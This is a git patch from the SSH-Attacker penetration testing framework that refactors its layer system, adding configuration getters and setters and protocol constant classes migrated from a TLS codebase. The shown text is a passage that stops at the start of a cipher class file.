From 622ed6c92870c531aa1566ef0cda68bdfbb2b6fb Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Steffen=20Bro=C3=9Fler?= Date: Mon, 29 May 2023 11:20:15 +0200 Subject: [PATCH 001/176] Essentials: - Enabeling Scanning for SSHv1 SErver - Migrating basic layersystem from tlsattacekr - migrating messages, parsers, serializiers and preparators to compile errorless - adding "session"-class as intermediaclass for transportlayer - extending rest to work with layers --- .../nds/sshattacker/core/config/Config.java | 43 + .../core/constants/MessageIdConstant.java | 4 +- .../core/constants/ProtocolMessageType.java | 48 + .../core/constants/SessionByteLength.java | 29 + .../core/crypto/cipher/DecryptionCipher.java | 32 + .../core/crypto/cipher/EncryptionCipher.java | 32 + .../core/crypto/hash/ExchangeHash.java | 2 +- .../crypto/kex/AbstractEcdhKeyExchange.java | 2 +- .../core/crypto/kex/DhKeyExchange.java | 2 +- .../core/crypto/kex/HybridKeyExchange.java | 2 +- .../core/crypto/kex/RsaKeyExchange.java | 2 +- .../core/exceptions/EndOfStreamException.java | 33 + .../core/exceptions/TimeoutException.java | 33 + .../GenericReceiveLayerConfiguration.java | 36 + .../core/layer/LayerConfiguration.java | 65 ++ .../core/layer/LayerProcessingResult.java | 83 ++ .../sshattacker/core/layer/LayerStack.java | 183 ++++ .../core/layer/LayerStackFactory.java | 75 ++ .../layer/LayerStackProcessingResult.java | 59 ++ .../nds/sshattacker/core/layer/Message.java | 31 + .../sshattacker/core/layer/ProtocolLayer.java | 280 +++++ .../core/layer/ReceiveLayerConfiguration.java | 32 + .../layer/constant/ImplementedLayers.java | 22 + .../layer/constant/LayerConfiguration.java | 26 + .../core/layer/constant/LayerType.java | 21 + .../core/layer/context/LayerContext.java | 74 ++ .../{state => layer/context}/SshContext.java | 143 +-- .../core/layer/context/TcpContext.java | 30 + .../core/layer/data/DataContainer.java | 40 + .../sshattacker/core/layer/data/Handler.java | 16 + .../sshattacker/core/layer/data/Parser.java | 209 ++++ .../core/layer/data/Preparator.java | 49 + .../core/layer/data/Serializer.java | 135 +++ .../core/layer/hints/LayerProcessingHint.java | 18 + .../core/layer/hints/RecordLayerHint.java | 93 ++ .../core/layer/impl/AuthenticationLayer.java | 229 +++++ .../core/layer/impl/ConnectionLayer.java | 229 +++++ .../core/layer/impl/SSH1Layer.java | 228 +++++ .../sshattacker/core/layer/impl/TcpLayer.java | 88 ++ .../core/layer/impl/TransportLayer.java | 265 +++++ .../core/layer/stream/HintedInputStream.java | 69 ++ .../HintedInputStreamAdapterStream.java | 48 + .../layer/stream/HintedLayerInputStream.java | 70 ++ .../cipher/PacketChaCha20Poly1305Cipher.java | 2 +- .../core/packet/cipher/PacketCipher.java | 2 +- .../packet/cipher/PacketCipherFactory.java | 2 +- .../core/packet/cipher/PacketGCMCipher.java | 2 +- .../core/packet/cipher/PacketMacedCipher.java | 2 +- .../packet/cipher/keys/KeySetGenerator.java | 2 +- .../core/packet/crypto/PacketDecryptor.java | 2 +- .../core/packet/crypto/PacketEncryptor.java | 2 +- .../packet/layer/AbstractPacketLayer.java | 2 +- .../core/packet/layer/BinaryPacketLayer.java | 2 +- .../core/packet/layer/BlobPacketLayer.java | 2 +- .../core/packet/layer/PacketLayerFactory.java | 2 +- .../handler/UserAuthBannerMessageHandler.java | 14 +- .../UserAuthFailureMessageHandler.java | 31 +- .../UserAuthHostbasedMessageHandler.java | 39 +- .../UserAuthInfoRequestMessageHandler.java | 31 +- .../UserAuthInfoResponseMessageHandler.java | 31 +- ...AuthKeyboardInteractiveMessageHandler.java | 31 +- .../handler/UserAuthNoneMessageHandler.java | 31 +- .../UserAuthPasswordMessageHandler.java | 31 +- .../handler/UserAuthPkOkMessageHandler.java | 32 +- .../handler/UserAuthPubkeyMessageHandler.java | 31 +- .../UserAuthSuccessMessageHandler.java | 31 +- .../UserAuthUnknownMessageHandler.java | 32 +- .../message/UserAuthBannerMessage.java | 47 +- .../message/UserAuthFailureMessage.java | 38 +- .../message/UserAuthHostbasedMessage.java | 39 +- .../message/UserAuthInfoRequestMessage.java | 37 +- .../message/UserAuthInfoResponseMessage.java | 39 +- .../UserAuthKeyboardInteractiveMessage.java | 38 +- .../message/UserAuthNoneMessage.java | 40 +- .../message/UserAuthPasswordMessage.java | 41 +- .../message/UserAuthPkOkMessage.java | 38 +- .../message/UserAuthPubkeyMessage.java | 38 +- .../message/UserAuthSuccessMessage.java | 38 +- .../message/UserAuthUnknownMessage.java | 40 +- .../parser/UserAuthBannerMessageParser.java | 23 +- .../parser/UserAuthFailureMessageParser.java | 27 +- .../UserAuthHostbasedMessageParser.java | 23 +- .../UserAuthInfoRequestMessageParser.java | 24 +- .../UserAuthInfoResponseMessageParser.java | 23 +- ...rAuthKeyboardInteractiveMessageParser.java | 23 +- .../parser/UserAuthNoneMessageParser.java | 23 +- .../parser/UserAuthPasswordMessageParser.java | 24 +- .../parser/UserAuthPkOkMessageParser.java | 23 +- .../parser/UserAuthPubkeyMessageParser.java | 23 +- .../parser/UserAuthRequestMessageParser.java | 8 +- .../parser/UserAuthSuccessMessageParser.java | 27 +- .../parser/UserAuthUnknownMessageParser.java | 27 +- .../UserAuthHostbasedMessagePreparator.java | 2 +- .../UserAuthPubkeyMessagePreparator.java | 9 +- .../core/protocol/common/ProtocolMessage.java | 22 +- .../common/ProtocolMessageHandler.java | 29 +- .../common/ProtocolMessageParser.java | 43 +- .../common/ProtocolMessagePreparator.java | 4 +- .../common/ProtocolMessageSerializer.java | 8 +- .../core/protocol/common/SshMessage.java | 2 +- .../protocol/common/SshMessageHandler.java | 16 +- .../protocol/common/SshMessageParser.java | 7 +- .../protocol/common/layer/MessageLayer.java | 21 +- .../protocol/connection/ChannelManager.java | 2 +- .../handler/ChannelCloseMessageHandler.java | 15 +- .../handler/ChannelDataMessageHandler.java | 16 +- .../handler/ChannelEofMessageHandler.java | 15 +- .../ChannelExtendedDataMessageHandler.java | 15 +- .../handler/ChannelFailureMessageHandler.java | 15 +- ...ChannelOpenConfirmationMessageHandler.java | 15 +- .../ChannelOpenFailureMessageHandler.java | 15 +- .../ChannelOpenSessionMessageHandler.java | 15 +- .../ChannelOpenUnknownMessageHandler.java | 15 +- ...ChannelRequestAuthAgentMessageHandler.java | 15 +- .../ChannelRequestBreakMessageHandler.java | 15 +- .../ChannelRequestEnvMessageHandler.java | 15 +- .../ChannelRequestExecMessageHandler.java | 14 +- ...hannelRequestExitSignalMessageHandler.java | 15 +- ...hannelRequestExitStatusMessageHandler.java | 11 +- .../ChannelRequestPtyMessageHandler.java | 15 +- .../ChannelRequestShellMessageHandler.java | 15 +- .../ChannelRequestSignalMessageHandler.java | 15 +- ...ChannelRequestSubsystemMessageHandler.java | 15 +- .../ChannelRequestUnknownMessageHandler.java | 15 +- ...nnelRequestWindowChangeMessageHandler.java | 11 +- .../ChannelRequestX11MessageHandler.java | 11 +- .../ChannelRequestXonXoffMessageHandler.java | 11 +- .../handler/ChannelSuccessMessageHandler.java | 15 +- .../ChannelWindowAdjustMessageHandler.java | 15 +- ...questCancelTcpIpForwardMessageHandler.java | 15 +- .../GlobalRequestFailureMessageHandler.java | 15 +- ...alRequestNoMoreSessionsMessageHandler.java | 15 +- ...lRequestOpenSshHostKeysMessageHandler.java | 15 +- .../GlobalRequestSuccessMessageHandler.java | 15 +- ...obalRequestTcpIpForwardMessageHandler.java | 15 +- .../GlobalRequestUnknownMessageHandler.java | 15 +- .../message/ChannelCloseMessage.java | 28 +- .../message/ChannelDataMessage.java | 28 +- .../connection/message/ChannelEofMessage.java | 28 +- .../message/ChannelExtendedDataMessage.java | 35 +- .../message/ChannelFailureMessage.java | 28 +- .../ChannelOpenConfirmationMessage.java | 28 +- .../message/ChannelOpenFailureMessage.java | 28 +- .../message/ChannelOpenSessionMessage.java | 28 +- .../message/ChannelOpenUnknownMessage.java | 28 +- .../ChannelRequestAuthAgentMessage.java | 28 +- .../message/ChannelRequestBreakMessage.java | 28 +- .../message/ChannelRequestEnvMessage.java | 28 +- .../message/ChannelRequestExecMessage.java | 30 +- .../ChannelRequestExitSignalMessage.java | 28 +- .../ChannelRequestExitStatusMessage.java | 28 +- .../message/ChannelRequestPtyMessage.java | 28 +- .../message/ChannelRequestShellMessage.java | 28 +- .../message/ChannelRequestSignalMessage.java | 28 +- .../ChannelRequestSubsystemMessage.java | 28 +- .../message/ChannelRequestUnknownMessage.java | 28 +- .../ChannelRequestWindowChangeMessage.java | 29 +- .../message/ChannelRequestX11Message.java | 28 +- .../message/ChannelRequestXonXoffMessage.java | 28 +- .../message/ChannelSuccessMessage.java | 32 +- .../message/ChannelWindowAdjustMessage.java | 37 +- ...lobalRequestCancelTcpIpForwardMessage.java | 34 +- .../message/GlobalRequestFailureMessage.java | 28 +- .../GlobalRequestNoMoreSessionsMessage.java | 29 +- .../GlobalRequestOpenSshHostKeysMessage.java | 34 +- .../message/GlobalRequestSuccessMessage.java | 30 +- .../GlobalRequestTcpIpForwardMessage.java | 34 +- .../message/GlobalRequestUnknownMessage.java | 28 +- .../parser/ChannelCloseMessageParser.java | 19 +- .../parser/ChannelDataMessageParser.java | 19 +- .../parser/ChannelEofMessageParser.java | 19 +- .../ChannelExtendedDataMessageParser.java | 20 +- .../parser/ChannelFailureMessageParser.java | 19 +- .../parser/ChannelMessageParser.java | 8 +- .../ChannelOpenConfirmationMessageParser.java | 12 +- .../ChannelOpenFailureMessageParser.java | 13 +- .../parser/ChannelOpenMessageParser.java | 7 +- .../ChannelOpenSessionMessageParser.java | 19 +- .../ChannelOpenUnknownMessageParser.java | 20 +- .../ChannelRequestAuthAgentMessageParser.java | 19 +- .../ChannelRequestBreakMessageParser.java | 19 +- .../ChannelRequestEnvMessageParser.java | 19 +- .../ChannelRequestExecMessageParser.java | 19 +- ...ChannelRequestExitSignalMessageParser.java | 19 +- ...ChannelRequestExitStatusMessageParser.java | 20 +- .../parser/ChannelRequestMessageParser.java | 18 +- .../ChannelRequestPtyMessageParser.java | 11 +- .../ChannelRequestShellMessageParser.java | 12 +- .../ChannelRequestSignalMessageParser.java | 13 +- .../ChannelRequestSubsystemMessageParser.java | 19 +- .../ChannelRequestUnknownMessageParser.java | 19 +- ...annelRequestWindowChangeMessageParser.java | 19 +- .../ChannelRequestX11MessageParser.java | 21 +- .../ChannelRequestXonXoffMessageParser.java | 19 +- .../parser/ChannelSuccessMessageParser.java | 20 +- .../ChannelWindowAdjustMessageParser.java | 19 +- ...equestCancelTcpIpForwardMessageParser.java | 13 +- .../GlobalRequestFailureMessageParser.java | 19 +- .../parser/GlobalRequestMessageParser.java | 18 +- ...balRequestNoMoreSessionsMessageParser.java | 19 +- ...alRequestOpenSshHostKeysMessageParser.java | 19 +- .../GlobalRequestSuccessMessageParser.java | 19 +- ...lobalRequestTcpIpForwardMessageParser.java | 20 +- .../GlobalRequestUnknownMessageParser.java | 19 +- .../ChannelCloseMessagePreparator.java | 5 +- .../preparator/ChannelMessagePreparator.java | 3 + ...nnelOpenConfirmationMessagePreparator.java | 3 +- .../ChannelOpenMessagePreparator.java | 7 +- .../handler/AsciiMessageHandler.java | 16 +- .../handler/DebugMessageHandler.java | 15 +- .../DhGexKeyExchangeGroupMessageHandler.java | 17 +- .../DhGexKeyExchangeInitMessageHandler.java | 16 +- ...exKeyExchangeOldRequestMessageHandler.java | 20 +- .../DhGexKeyExchangeReplyMessageHandler.java | 19 +- ...DhGexKeyExchangeRequestMessageHandler.java | 24 +- .../DhKeyExchangeInitMessageHandler.java | 16 +- .../DhKeyExchangeReplyMessageHandler.java | 15 +- .../handler/DisconnectMessageHandler.java | 15 +- .../EcdhKeyExchangeInitMessageHandler.java | 15 +- .../EcdhKeyExchangeReplyMessageHandler.java | 19 +- .../HybridKeyExchangeInitMessageHandler.java | 16 +- .../HybridKeyExchangeReplyMessageHandler.java | 23 +- .../handler/IgnoreMessageHandler.java | 15 +- .../KeyExchangeInitMessageHandler.java | 15 +- .../handler/NewKeysMessageHandler.java | 15 +- .../RsaKeyExchangeDoneMessageHandler.java | 18 +- .../RsaKeyExchangePubkeyMessageHandler.java | 18 +- .../RsaKeyExchangeSecretMessageHandler.java | 26 +- .../handler/ServiceAcceptMessageHandler.java | 15 +- .../handler/ServiceRequestMessageHandler.java | 15 +- .../handler/UnimplementedMessageHandler.java | 15 +- .../handler/UnknownMessageHandler.java | 15 +- .../VersionExchangeMessageHandler.java | 15 +- .../transport/message/AsciiMessage.java | 29 +- .../transport/message/DebugMessage.java | 28 +- .../message/DhGexKeyExchangeGroupMessage.java | 28 +- .../message/DhGexKeyExchangeInitMessage.java | 29 +- .../DhGexKeyExchangeOldRequestMessage.java | 29 +- .../message/DhGexKeyExchangeReplyMessage.java | 28 +- .../DhGexKeyExchangeRequestMessage.java | 29 +- .../message/DhKeyExchangeInitMessage.java | 29 +- .../message/DhKeyExchangeReplyMessage.java | 28 +- .../transport/message/DisconnectMessage.java | 28 +- .../message/EcdhKeyExchangeInitMessage.java | 28 +- .../message/EcdhKeyExchangeReplyMessage.java | 28 +- .../message/HybridKeyExchangeInitMessage.java | 43 +- .../HybridKeyExchangeReplyMessage.java | 44 +- .../transport/message/IgnoreMessage.java | 33 +- .../message/KeyExchangeInitMessage.java | 28 +- .../transport/message/NewKeysMessage.java | 28 +- .../message/RsaKeyExchangeDoneMessage.java | 32 +- .../message/RsaKeyExchangePubkeyMessage.java | 33 +- .../message/RsaKeyExchangeSecretMessage.java | 32 +- .../message/ServiceAcceptMessage.java | 28 +- .../message/ServiceRequestMessage.java | 28 +- .../message/UnimplementedMessage.java | 28 +- .../transport/message/UnknownMessage.java | 29 +- .../message/VersionExchangeMessage.java | 28 +- .../transport/parser/AsciiMessageParser.java | 13 +- .../transport/parser/DebugMessageParser.java | 19 +- .../DhGexKeyExchangeGroupMessageParser.java | 12 +- .../DhGexKeyExchangeInitMessageParser.java | 23 +- ...GexKeyExchangeOldRequestMessageParser.java | 23 +- .../DhGexKeyExchangeReplyMessageParser.java | 19 +- .../DhGexKeyExchangeRequestMessageParser.java | 12 +- .../DhKeyExchangeInitMessageParser.java | 23 +- .../DhKeyExchangeReplyMessageParser.java | 21 +- .../parser/DisconnectMessageParser.java | 22 +- .../EcdhKeyExchangeInitMessageParser.java | 20 +- .../EcdhKeyExchangeReplyMessageParser.java | 21 +- .../HybridKeyExchangeInitMessageParser.java | 20 +- .../HybridKeyExchangeReplyMessageParser.java | 50 +- .../transport/parser/IgnoreMessageParser.java | 22 +- .../parser/KeyExchangeInitMessageParser.java | 22 +- .../parser/NewKeysMessageParser.java | 21 +- .../RsaKeyExchangeDoneMessageParser.java | 19 +- .../RsaKeyExchangePubkeyMessageParser.java | 19 +- .../RsaKeyExchangeSecretMessageParser.java | 20 +- .../parser/ServiceAcceptMessageParser.java | 22 +- .../parser/ServiceRequestMessageParser.java | 16 +- .../parser/UnimplementedMessageParser.java | 22 +- .../parser/UnknownMessageParser.java | 22 +- .../parser/VersionExchangeMessageParser.java | 14 +- .../preparator/AsciiMessagePreparator.java | 2 +- ...hGexKeyExchangeGroupMessagePreparator.java | 5 +- ...DhGexKeyExchangeInitMessagePreparator.java | 3 +- ...eyExchangeOldRequestMessagePreparator.java | 1 + ...hGexKeyExchangeReplyMessagePreparator.java | 15 +- ...exKeyExchangeRequestMessagePreparator.java | 3 +- .../DhKeyExchangeInitMessagePreparator.java | 1 + .../DhKeyExchangeReplyMessagePreparator.java | 15 +- .../EcdhKeyExchangeInitMessagePreparator.java | 5 +- ...EcdhKeyExchangeReplyMessagePreparator.java | 15 +- ...ybridKeyExchangeInitMessagePreperator.java | 3 +- ...bridKeyExchangeReplyMessagePreparator.java | 19 +- .../KeyExchangeInitMessagePreparator.java | 12 +- .../RsaKeyExchangeDoneMessagePreparator.java | 9 +- ...RsaKeyExchangePubkeyMessagePreparator.java | 3 +- ...RsaKeyExchangeSecretMessagePreparator.java | 8 +- .../VersionExchangeMessagePreparator.java | 12 +- .../core/protocol/util/KeyExchangeUtil.java | 2 +- .../nds/sshattacker/core/session/Session.java | 369 +++++++ .../session/SessionCryptoComputations.java | 381 +++++++ .../core/session/cipher/CipherState.java | 126 +++ .../core/session/cipher/SessionCipher.java | 274 +++++ .../session/cipher/SessionCipherFactory.java | 87 ++ .../session/cipher/SessionNullCipher.java | 40 + .../session/cipher/cryptohelper/KeySet.java | 126 +++ .../cipher/cryptohelper/KeySetGenerator.java | 262 +++++ .../core/session/crypto/Decryptor.java | 24 + .../core/session/crypto/Encryptor.java | 24 + .../session/crypto/SessionCryptoUnit.java | 56 + .../core/session/crypto/SessionDecryptor.java | 65 ++ .../core/session/crypto/SessionEncryptor.java | 61 ++ .../core/session/parser/SessionParser.java | 107 ++ .../session/preparator/SessionPreparator.java | 115 +++ .../session/serializer/SessionSerializer.java | 78 ++ .../nds/sshattacker/core/state/Context.java | 185 ++++ .../core/state/ContextContainer.java | 50 +- .../sshattacker/core/state/SshContext2.java | 963 ++++++++++++++++++ .../rub/nds/sshattacker/core/state/State.java | 44 +- .../workflow/DefaultWorkflowExecutor.java | 35 +- .../core/workflow/WorkflowExecutor.java | 100 ++ .../workflow/WorkflowExecutorRunnable.java | 5 +- .../workflow/WorkflowTraceSerializer.java | 1 + .../action/ActivateEncryptionAction.java | 2 +- .../action/ChangeCompressionAction.java | 2 +- .../action/ChangePacketLayerAction.java | 2 +- .../action/DeactivateEncryptionAction.java | 2 +- .../action/DynamicKeyExchangeAction.java | 2 +- .../action/ForwardMessagesAction.java | 4 +- .../action/ProxyFilterMessagesAction.java | 7 +- .../core/workflow/action/ReceiveAction.java | 2 +- .../core/workflow/action/SendAction.java | 7 +- .../action/executor/ReceiveMessageHelper.java | 6 +- .../action/executor/SendMessageHelper.java | 30 +- .../core/workflow/chooser/Chooser.java | 34 +- .../core/workflow/chooser/ChooserFactory.java | 4 +- .../core/workflow/chooser/DefaultChooser.java | 252 +++-- 339 files changed, 10642 insertions(+), 1708 deletions(-) create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/ProtocolMessageType.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/SessionByteLength.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/DecryptionCipher.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/EncryptionCipher.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/exceptions/EndOfStreamException.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/exceptions/TimeoutException.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/GenericReceiveLayerConfiguration.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerConfiguration.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerProcessingResult.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStack.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStackFactory.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStackProcessingResult.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/Message.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ReceiveLayerConfiguration.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/constant/ImplementedLayers.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/constant/LayerConfiguration.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/constant/LayerType.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/LayerContext.java rename SSH-Core/src/main/java/de/rub/nds/sshattacker/core/{state => layer/context}/SshContext.java (92%) mode change 100755 => 100644 create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/TcpContext.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/DataContainer.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Handler.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Parser.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Preparator.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Serializer.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/hints/LayerProcessingHint.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/hints/RecordLayerHint.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/AuthenticationLayer.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/ConnectionLayer.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/HintedInputStream.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/HintedInputStreamAdapterStream.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/HintedLayerInputStream.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/Session.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/SessionCryptoComputations.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/cipher/CipherState.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/cipher/SessionCipher.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/cipher/SessionCipherFactory.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/cipher/SessionNullCipher.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/cipher/cryptohelper/KeySet.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/cipher/cryptohelper/KeySetGenerator.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/crypto/Decryptor.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/crypto/Encryptor.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/crypto/SessionCryptoUnit.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/crypto/SessionDecryptor.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/crypto/SessionEncryptor.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/parser/SessionParser.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/preparator/SessionPreparator.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/serializer/SessionSerializer.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/state/Context.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/state/SshContext2.java diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java index 0ecd46a1d..84dcffbca 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java @@ -14,6 +14,7 @@ import de.rub.nds.sshattacker.core.constants.*; import de.rub.nds.sshattacker.core.crypto.ec.PointFormatter; import de.rub.nds.sshattacker.core.crypto.keys.*; +import de.rub.nds.sshattacker.core.layer.constant.LayerConfiguration; import de.rub.nds.sshattacker.core.protocol.authentication.AuthenticationResponse; import de.rub.nds.sshattacker.core.protocol.connection.ChannelDefaults; import de.rub.nds.sshattacker.core.workflow.factory.WorkflowTraceType; @@ -40,6 +41,16 @@ public class Config implements Serializable { private static final Logger LOGGER = LogManager.getLogger(); + public Integer getDefaultAdditionalPadding() { + return defaultAdditionalPadding; + } + + public void setDefaultAdditionalPadding(Integer defaultAdditionalPadding) { + this.defaultAdditionalPadding = defaultAdditionalPadding; + } + + private Integer defaultAdditionalPadding = 0; + private static final String DEFAULT_CONFIG_FILE = "/default_config.xml"; private static final ConfigCache DEFAULT_CONFIG_CACHE; @@ -416,6 +427,34 @@ public class Config implements Serializable { /** Fallback for type of chooser, to initialize the chooser in the SshContext */ private ChooserType chooserType = ChooserType.DEFAULT; + private LayerConfiguration defaultLayerConfiguration; + + public CompressionAlgorithm getDefaultSelectedCompressionAlgorithm() { + return defaultSelectedCompressionAlgorithm; + } + + private CompressionAlgorithm defaultSelectedCompressionAlgorithm = CompressionAlgorithm.NONE; + + public EncryptionAlgorithm getDefaultSelectedEncryptionAlgorithm() { + return defaultSelectedEncryptionAlgorithm; + } + + private EncryptionAlgorithm defaultSelectedEncryptionAlgorithm = + EncryptionAlgorithm.AEAD_AES_256_GCM; + + public MacAlgorithm getDefaultSelectedMacAlgorithm() { + return defaultSelectedMacAlgorithm; + } + + private MacAlgorithm defaultSelectedMacAlgorithm = MacAlgorithm.AEAD_AES_256_GCM; + + public KeyExchangeAlgorithm getDefaultSelectedKeyExchangeAlgorithm() { + return defaultSelectedKeyExchangeAlgorithm; + } + + private KeyExchangeAlgorithm defaultSelectedKeyExchangeAlgorithm = + KeyExchangeAlgorithm.DIFFIE_HELLMAN_GROUP14_SHA256; + // region Constructors and Initialization public Config() { @@ -1615,4 +1654,8 @@ public ChooserType getChooserType() { public void setChooserType(ChooserType chooserType) { this.chooserType = chooserType; } + + public LayerConfiguration getDefaultLayerConfiguration() { + return defaultLayerConfiguration; + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/MessageIdConstant.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/MessageIdConstant.java index 5f1448e31..e3f628b17 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/MessageIdConstant.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/MessageIdConstant.java @@ -8,7 +8,7 @@ package de.rub.nds.sshattacker.core.constants; import de.rub.nds.sshattacker.core.exceptions.ParserException; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.state.Context; import java.util.*; public enum MessageIdConstant { @@ -175,7 +175,7 @@ public static String getNameById(byte id) { } } - public static MessageIdConstant fromId(byte id, SshContext context) { + public static MessageIdConstant fromId(byte id, Context context) { List idList = map.get(id); if (idList == null) { throw new ParserException("Unable to parse message with unknown id"); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/ProtocolMessageType.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/ProtocolMessageType.java new file mode 100644 index 000000000..cd1b31370 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/ProtocolMessageType.java @@ -0,0 +1,48 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.constants; + +import java.util.HashMap; +import java.util.Map; + +public enum ProtocolMessageType { + UNKNOWN((byte) 99), + CHANGE_CIPHER_SPEC((byte) 20), + ALERT((byte) 21), + HANDSHAKE((byte) 22), + APPLICATION_DATA((byte) 23), + HEARTBEAT((byte) 24), + TLS12_CID((byte) 25); + + private byte value; + + private static final Map MAP; + + private ProtocolMessageType(byte value) { + this.value = value; + } + + static { + MAP = new HashMap<>(); + for (ProtocolMessageType cm : ProtocolMessageType.values()) { + MAP.put(cm.value, cm); + } + } + + public static ProtocolMessageType getContentType(byte value) { + return MAP.get(value); + } + + public byte getValue() { + return value; + } + + public byte[] getArrayValue() { + return new byte[] {value}; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/SessionByteLength.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/SessionByteLength.java new file mode 100644 index 000000000..b04ff85e9 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/SessionByteLength.java @@ -0,0 +1,29 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.constants; + +public class SessionByteLength { + + /** Content Type length */ + public static final int CONTENT_TYPE = 1; + /** Record length length */ + public static final int RECORD_LENGTH = 2; + + /** protocol version byte length */ + public static final int PROTOCOL_VERSION = 2; + + public static final int SEQUENCE_NUMBER = 8; + + /** epoch for DTLS */ + public static final int DTLS_EPOCH = 2; + + /** sequence number for DTLS */ + public static final int DTLS_SEQUENCE_NUMBER = 6; + + private SessionByteLength() {} +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/DecryptionCipher.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/DecryptionCipher.java new file mode 100644 index 000000000..2ace49acd --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/DecryptionCipher.java @@ -0,0 +1,32 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * 